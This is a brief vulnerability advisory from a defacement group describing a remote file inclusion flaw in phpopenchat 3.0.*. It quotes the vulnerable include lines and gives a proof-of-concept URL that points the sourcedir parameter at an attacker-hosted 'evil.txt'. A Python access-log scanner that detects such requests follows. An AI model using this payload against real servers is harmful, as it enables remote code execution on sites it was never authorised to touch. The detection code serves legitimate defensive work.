
phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit



[W]orld [D]efacers Team
--------------------Summary----------------

eVuln ID: WD23

Vendor:  phpopenchat-3.0.*

Vendor's Web Site: http://phpopenchat.org

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )

-----------------Description---------------

include_once("QueryString.php");
include_once("Settings.php");
include_once("$sourcedir/Subs.php");
include_once("$sourcedir/Errors.php");
include_once("$sourcedir/Load.php");
//include_once("$sourcedir/Security.php");

--------------PoC/Exploit----------------------

http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt?

--------------Solution---------------------

No Patch available.
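
With no patch available, requests shaped like the PoC above can still be found in web server access logs, because the include path arrives as a client-supplied sourcedir parameter. The detector below is an added example, not part of the original advisory; the combined log format, the sample log lines and the helper names (classify, scan, fully_unquote) are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "sourcedir"  # parameter name from the advisory's PoC URL
# Request target inside a combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that would point include_once() at a URL, stream wrapper or UNC share.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.I)

SAMPLE_LOG = [  # constructed log lines, not taken from the advisory
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /phpopenchat/index.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2007:10:00:02 +0000] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt? HTTP/1.0" 200 0',
    '203.0.113.5 - - [01/Jan/2007:10:00:03 +0000] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=%68ttp%3A%2F%2Fhost%2Fevil.txt HTTP/1.0" 200 0',
    '192.0.2.44 - - [01/Jan/2007:10:00:09 +0000] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=./Sources HTTP/1.1" 200 0',
]

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'remote', 'supplied' or None for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    verdict = None
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != PARAM:
            continue
        if REMOTE_RE.match(fully_unquote(value)):
            return "remote"
        verdict = "supplied"  # client-set include path: still worth reviewing
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every line that sets PARAM."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, verdict) for n, verdict in hits if verdict]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {PARAM} {verdict}")
```

A "supplied" verdict marks a request that sets the include path to a local-looking value; it is reported separately so it can be reviewed without being counted as a remote inclusion attempt.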

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)
